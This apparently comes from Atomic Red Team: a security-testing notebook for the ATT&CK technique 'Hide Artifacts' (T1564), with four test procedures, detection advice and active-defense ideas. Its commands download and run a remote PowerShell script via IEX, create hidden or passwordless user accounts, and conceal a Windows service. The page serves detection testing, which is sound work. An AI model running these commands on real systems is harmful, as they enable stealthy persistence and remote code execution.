# T1564 - Hide Artifacts
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)

## Atomic Tests

### Atomic Test #1 - Extract binary files via VBA
This module extracts a binary (calc.exe) from inside of another binary. 

In the wild maldoc authors will use this technique to hide binaries inside of files stored 
within the office document itself. An example of this technique can be seen in sample

f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226

This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
oleObject.bin file is a payload that is parsed out and executed on the file system.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  Stop-Process -Name "winword"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Create a Hidden User Called "$"Creating a user with a username containing "$"**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
net user $ ATOMIC123! /add /active:yes```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 2

#### Cleanup: 
```cmd
net user $ /DELETE 2>&1```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Create an "Administrator " user (with a space on the end)Creating a user with a username containing with a space on the end**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-LocalUser -Name "Administrator " -NoPassword```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 3

#### Cleanup: 
```powershell
Remove-LocalUser -Name "Administrator " 2>&1 | out-null```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Create and Hide a Service with sc.exeThe following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.

Upon successful execution, sc.exe creates a new service changes the security descriptor.

https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe"
sc sdset AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 4

#### Cleanup: 
```cmd
sc.exe delete AtomicService
```

In [ ]:
Invoke-AtomicTest T1564 -TestNumbers 4 -Cleanup

## Detection
Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.


## Shield Active Defense
### Software Manipulation 
 Make changes to a system's software properties and functions to achieve a desired effect. 

 Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.
#### Opportunity
There is an opportunity to block an adversary's intended action and force them to reveal additional TTPs.
#### Use Case
A defender can manipulate commands on system so that an adversary is unable to hide artifacts in ways they normally would.
#### Procedures
Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities.
Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use.
Alter the output of an adversary's profiling commands to make newly-built systems look like the operating system was installed months earlier.
Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.
